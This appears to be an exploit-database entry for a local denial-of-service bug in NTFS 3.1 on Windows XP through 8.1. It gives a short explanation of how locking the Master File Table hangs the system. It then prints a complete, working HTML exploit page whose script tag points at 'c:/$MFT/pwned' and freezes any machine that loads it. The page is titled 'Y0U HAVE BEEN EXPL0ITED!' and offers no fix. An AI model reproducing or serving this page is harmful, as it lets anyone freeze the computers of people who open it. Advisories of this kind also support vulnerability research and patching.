NTFS 3.1 - Master File Table Denial of Service

2017-06-26 / 2017-06-27
Credit: EagleWire
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

<!-- # Exploit Title: NTFS 3.1 Master File Table DoS Exploit # Date: 6\23\17 # Exploit Author: EagleWire # Version: Windows XP/7/8/8.1 # Tested on: Windows XP/7/8/8.1 1. Description: This exploits a vulnerability in Windows XP to Windows 8.1. The master file table, or MFT, is a hidden file in the NTFS file system. It maps out all files in the drive. It is supposed to be protected from any user access because all files that use NTFS have a reference to it. If the directory is recreated, the system will lock the file until the next reboot. Therefore, for example, when trying to create a file or read the volume of files, NTFS attempts to seize ERESOURCE $ MFT file and will hang at this stage forever. 2. Exploit: The exploit tries to access a nonexistant file c:/$MFT/pwned. The browser will hang then stop responding, then after the browser exists, the rest of the system becomes unresponsive. --> <!DOCTYPE html> <html lang="en"> <head> <link rel="stylesheet" href="stylesheet.css"> <meta charset="utf-8" /> <title>Y0U HAVE BEEN EXPL0ITED!</title> </head> <body> <script src="c:/$MFT/pwned"></script> </body> </html> <!-- 3: Solution: -->


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top